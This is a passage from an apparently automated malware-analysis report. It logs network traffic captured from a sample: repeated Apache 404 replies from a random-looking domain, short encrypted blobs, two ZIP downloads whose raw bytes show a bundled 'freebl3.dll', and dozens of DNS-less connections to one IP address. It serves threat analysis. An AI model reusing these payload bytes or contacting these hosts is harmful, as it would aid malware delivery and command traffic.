3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6f 33 36 66 61 66 73 33 73 6e 36 78 6f 75 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at o36fafs3sn6xou.com Port 80</address></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:38:23 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 39Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb b8 4c 03 49 b2 cd ea a5 ee 54 18 ec 87 65 a7 ab 4b 75 c0 a4 83 ec 24 Data Ascii: %S`Nh&WQLITeKu$
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:38:26 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 406Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6f 33 36 66 61 66 73 33 73 6e 36 78 6f 75 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at o36fafs3sn6xou.com Port 80</address></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:38:27 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 85Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e e8 87 b6 b8 e7 4a 1d f2 d1 25 fa f4 1b 33 9d ef 95 ba 22 b1 8d df eb 3d ae 1a 90 ac 21 2e c6 23 1e dd 18 36 e6 98 91 4b d3 b3 18 c6 c7 93 bc 6f f0 53 66 aa 99 c7 cd c8 e1 0d 80 6c e6 3f ec 8d a5 Data Ascii: %S`Nh&WQY^J%3"=!.#6KoSfl?
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:38:27 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 31Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e fe cd ac fa f9 4c 6f ac c5 03 d4 Data Ascii: %S`Nh&WQY^Lo
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:38:29 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 406Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6f 33 36 66 61 66 73 33 73 6e 36 78 6f 75 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at o36fafs3sn6xou.com Port 80</address></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:38:29 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 70Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e ec 8a ac fd a3 18 07 bf df 26 ba fe 18 39 9e ee 83 e6 70 e7 d8 c9 f3 5a a0 4f 92 aa 1c 33 cd 72 46 c1 46 67 b9 cf 88 31 91 e7 59 84 94 cf aa 3e b0 0e Data Ascii: %S`Nh&WQY^&9pZO3rFFg1Y>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:38:30 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 406Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6f 33 36 66 61 66 73 33 73 6e 36 78 6f 75 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at o36fafs3sn6xou.com Port 80</address></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:38:31 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 406Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6f 33 36 66 61 66 73 33 73 6e 36 78 6f 75 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at o36fafs3sn6xou.com Port 80</address></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:38:31 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 70Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e ec 8a ac fd a3 18 07 bf df 26 ba fe 18 39 9e ee 83 e6 70 e7 d8 c9 f3 5a a0 4f 92 aa 1c 33 cd 72 46 c1 46 67 b9 cf 88 31 91 e7 59 84 94 cf aa 3e b0 0e Data Ascii: %S`Nh&WQY^&9pZO3rFFg1Y>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Nov 2022 09:38:32 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 406Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6f 33 36 66 61 66 73 33 73 6e 36 78 6f 75 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at o36fafs3sn6xou.com Port 80</address></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sat, 19 Nov 2022 09:38:48 GMTContent-Type: application/zipContent-Length: 2685679Last-Modified: Mon, 12 Sep 2022 13:14:59 GMTConnection: keep-aliveETag: "631f30d3-28faef"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 24 56 25 55 2b 6d 5c 08 39 7c 05 00 50 75 0a 00 0b 00 00 00 66 72 65 65 62 6c 33 2e 64 6c 6c ec bd 0f 5c 54 e7 95 37 3e 97 19 61 d0 89 77 28 34 21 29 55 48 68 ab ad 4d e7 3a a6 91 48 13 8c 0c 90 c4 31 18 1c 35 bb 4e 62 ba d6 f5 75 f3 26 46 99 c4 76 33 2d 64 20 ce e3 75 5a 92 d5 d6 6e b5 75 df b2 5d f7 7d e9 bb b4 ab c4 b4 da cc 80 85 11 29 0c 4a 61 50 aa 24 a1 66 28 6c 3b 40 2a ff 52 e6 77 ce 79 ee 9d 19 40 52 b3 bf ee 2f ed ef b3 f9 44 e6 fe 7d 9e f3 9c e7 fc f9 9e f3 fc b9 d6 bf da ab 11 34 1a 8d 4e 33 fd bf 3c cd 1f ff 6f 2f fc 5b b8 f8 27 0b 35 27 92 7f 91 75 4a 58 fb 8b ac 0d 3b fe c7 9e cc 5d bb 9f fd db dd 4f fd cf cc bf 79 ea 99 67 9e 2d cd fc e2 97 32 77 3b 9e c9 fc 1f cf 64 e6 3f 5a 92 f9 3f 9f dd f6 a5 bb b3 35 9a 62 8b 46 b3 56 48 d4 8c ac f8 c8 df a8 e5 f5 6a ee cc 5a 20 2c 84 42 f5 1a cd 8a 04 ba b6 eb 23 70 6c 8c 56 69 a4 63 b8 95 48 54 c7 7e 35 81 f9 d4 88 f3 7f 98 0f b7 f3 56 d3 4b 46 fe 0a ff e5 3f 45 19 f3 35 25 f0 fb 1d f8 f5 e3 c5 aa f9 9a bd da b8 46 15 cc d7 14 7f 0e 7e 8f cd d7 84 ef d2 68 0e de 3a 5f 93 a1 99 fb 3f 7d a6 5e 73 2c ee bc 7a d1 7c 4d 9e 30 f7 f3 77 97 7e 69 6f 29 fc 1e 32 28 ed 5a a8 9f c5 fc 4c 8d 66 eb dd bb b7 3d 55 fa 94 46 73 36 11 1a 0b 75 68 f4 f0 8b bc 98 de 47 79 77 f3 c7 34 b9 05 f0 c7 34 9f 78 a3 b9 63 fe cc e7 bc 77 9b 4c 7f b3 fd 6f 95 aa ca 94 e7 32 66 3d 97 77 f7 ee 3d bb b1 43 88 27 55 9c a7 9a 45 37 7a ee 4b 4f 3f fb 37 1a e2 11 f2 4a 03 7d aa b9 73 d6 73 0f 6a fe fb bf 3f eb ff 6c ec d7 3b 1e 05 79 0d 0d 2f d0 6b 5c 67 75 95 de d2 85 ac 6c 25 5c 71 79 45 57 6f d8 de b0 23 b5 37 12 09 35 f1 db 92 d7 de d0 12 ff 1f bc bf 69 a3 6c d1 c3 7b 8b 64 47 86 ec 4c 93 6d 46 d9 6a a8 8c 94 de 39 2c 1a 93 86 c5 94 32 13 94 36 b0 64 c7 3c 2c e7 6b bc 9c 53 11 f8 6f e0 93 4d 65 2b e0 de 0f e0 bf a6 32 93 72 b4 d3 b8 71 a7 66 a7 e6 b1 f5 c5 a1 07 be 99 08 0f 67 3c f1 a4 bd 21 ae be 92 4d 1b 39 c9 0f 44 49 36 b1 26 85 e8 26 51 ba ee 7a 27 5c fa 77 b2 85 28 b1 1b 64 ab be f2 72 e9 62 20 46 0b c4 ec 23 62 3e c1 1b 35 3c 9f 37 ea fa 40 6e d3 be 28 25 fb 62 94 3c 86 94 14 af df 14 3a 79 88 28 81 aa 8c 91 d7 b0 a2 50 35 7f 77 20 81 4d b1 f0 13 4f fe b5 bd 21 8e 1f 0e 7d e5 f5 d2 4c d9 69 d8 a9 d9 18 7a fd 1f f1 5d 3d 70 64 61 a4 8e de dd c1 df c5 76 f1 f6 b8 fa c6 5c 83 c5 6c 6d f6 32 d9 9a fe 4f 27 4c f3 8d 52 88 e5 67 17 35 e5 67 af 40 23 e1 1a 37 ee be 9d f9 5d bd 49 8e 8f 78 be ac 5f e5 34 3e 9f b6 43 0b 4d e8 ff 31 e8 f1 0e 1d 1e 1d 87 23 d7 8b d9 cb 34 62 c5 61 3c 74 ea e1 e8 eb 70 24 3b d2 2a af 8b 15 2e 38 64 17 d9 98 ab 77 ac 38 d4 9a ac b0 4e ac d8 8b d7 5f cc ce 54 18 94 9f bd 92 d5 bb ea f5 50 7d b6 ec 4c df e4 fb 9d 76 e3 63 a1 27 80 62 79 6d b6 c9 75 d6 30 7a 15 9e 36 49 5e a0 8d 0c 23 fc a6 2b bf 69 ca af 51 f9 35 28 bf
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sat, 19 Nov 2022 09:39:12 GMTContent-Type: application/zipContent-Length: 2685679Last-Modified: Mon, 12 Sep 2022 13:14:59 GMTConnection: keep-aliveETag: "631f30d3-28faef"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 24 56 25 55 2b 6d 5c 08 39 7c 05 00 50 75 0a 00 0b 00 00 00 66 72 65 65 62 6c 33 2e 64 6c 6c ec bd 0f 5c 54 e7 95 37 3e 97 19 61 d0 89 77 28 34 21 29 55 48 68 ab ad 4d e7 3a a6 91 48 13 8c 0c 90 c4 31 18 1c 35 bb 4e 62 ba d6 f5 75 f3 26 46 99 c4 76 33 2d 64 20 ce e3 75 5a 92 d5 d6 6e b5 75 df b2 5d f7 7d e9 bb b4 ab c4 b4 da cc 80 85 11 29 0c 4a 61 50 aa 24 a1 66 28 6c 3b 40 2a ff 52 e6 77 ce 79 ee 9d 19 40 52 b3 bf ee 2f ed ef b3 f9 44 e6 fe 7d 9e f3 9c e7 fc f9 9e f3 fc b9 d6 bf da ab 11 34 1a 8d 4e 33 fd bf 3c cd 1f ff 6f 2f fc 5b b8 f8 27 0b 35 27 92 7f 91 75 4a 58 fb 8b ac 0d 3b fe c7 9e cc 5d bb 9f fd db dd 4f fd cf cc bf 79 ea 99 67 9e 2d cd fc e2 97 32 77 3b 9e c9 fc 1f cf 64 e6 3f 5a 92 f9 3f 9f dd f6 a5 bb b3 35 9a 62 8b 46 b3 56 48 d4 8c ac f8 c8 df a8 e5 f5 6a ee cc 5a 20 2c 84 42 f5 1a cd 8a 04 ba b6 eb 23 70 6c 8c 56 69 a4 63 b8 95 48 54 c7 7e 35 81 f9 d4 88 f3 7f 98 0f b7 f3 56 d3 4b 46 fe 0a ff e5 3f 45 19 f3 35 25 f0 fb 1d f8 f5 e3 c5 aa f9 9a bd da b8 46 15 cc d7 14 7f 0e 7e 8f cd d7 84 ef d2 68 0e de 3a 5f 93 a1 99 fb 3f 7d a6 5e 73 2c ee bc 7a d1 7c 4d 9e 30 f7 f3 77 97 7e 69 6f 29 fc 1e 32 28 ed 5a a8 9f c5 fc 4c 8d 66 eb dd bb b7 3d 55 fa 94 46 73 36 11 1a 0b 75 68 f4 f0 8b bc 98 de 47 79 77 f3 c7 34 b9 05 f0 c7 34 9f 78 a3 b9 63 fe cc e7 bc 77 9b 4c 7f b3 fd 6f 95 aa ca 94 e7 32 66 3d 97 77 f7 ee 3d bb b1 43 88 27 55 9c a7 9a 45 37 7a ee 4b 4f 3f fb 37 1a e2 11 f2 4a 03 7d aa b9 73 d6 73 0f 6a fe fb bf 3f eb ff 6c ec d7 3b 1e 05 79 0d 0d 2f d0 6b 5c 67 75 95 de d2 85 ac 6c 25 5c 71 79 45 57 6f d8 de b0 23 b5 37 12 09 35 f1 db 92 d7 de d0 12 ff 1f bc bf 69 a3 6c d1 c3 7b 8b 64 47 86 ec 4c 93 6d 46 d9 6a a8 8c 94 de 39 2c 1a 93 86 c5 94 32 13 94 36 b0 64 c7 3c 2c e7 6b bc 9c 53 11 f8 6f e0 93 4d 65 2b e0 de 0f e0 bf a6 32 93 72 b4 d3 b8 71 a7 66 a7 e6 b1 f5 c5 a1 07 be 99 08 0f 67 3c f1 a4 bd 21 ae be 92 4d 1b 39 c9 0f 44 49 36 b1 26 85 e8 26 51 ba ee 7a 27 5c fa 77 b2 85 28 b1 1b 64 ab be f2 72 e9 62 20 46 0b c4 ec 23 62 3e c1 1b 35 3c 9f 37 ea fa 40 6e d3 be 28 25 fb 62 94 3c 86 94 14 af df 14 3a 79 88 28 81 aa 8c 91 d7 b0 a2 50 35 7f 77 20 81 4d b1 f0 13 4f fe b5 bd 21 8e 1f 0e 7d e5 f5 d2 4c d9 69 d8 a9 d9 18 7a fd 1f f1 5d 3d 70 64 61 a4 8e de dd c1 df c5 76 f1 f6 b8 fa c6 5c 83 c5 6c 6d f6 32 d9 9a fe 4f 27 4c f3 8d 52 88 e5 67 17 35 e5 67 af 40 23 e1 1a 37 ee be 9d f9 5d bd 49 8e 8f 78 be ac 5f e5 34 3e 9f b6 43 0b 4d e8 ff 31 e8 f1 0e 1d 1e 1d 87 23 d7 8b d9 cb 34 62 c5 61 3c 74 ea e1 e8 eb 70 24 3b d2 2a af 8b 15 2e 38 64 17 d9 98 ab 77 ac 38 d4 9a ac b0 4e ac d8 8b d7 5f cc ce 54 18 94 9f bd 92 d5 bb ea f5 50 7d b6 ec 4c df e4 fb 9d 76 e3 63 a1 27 80 62 79 6d b6 c9 75 d6 30 7a 15 9e 36 49 5e a0 8d 0c 23 fc a6 2b bf 69 ca af 51 f9 35 28 bf
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.168
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.168
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.168
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.168
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.168
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.168
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.168
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.168
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.168
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.168
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.168
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.168
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.168
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.168
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.168
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.168
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.168
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.168
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.168
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.168
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.168
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.168
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.168
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.168
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.168
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.168
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.168
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.168
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.168
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.168
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.168
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.168
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.168
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.168
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.168
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.168
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.168
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.168
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.168
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.168
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.168
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.168
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.168
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.168
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.168
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.168
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.168
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.168
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.168
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.56.146.168
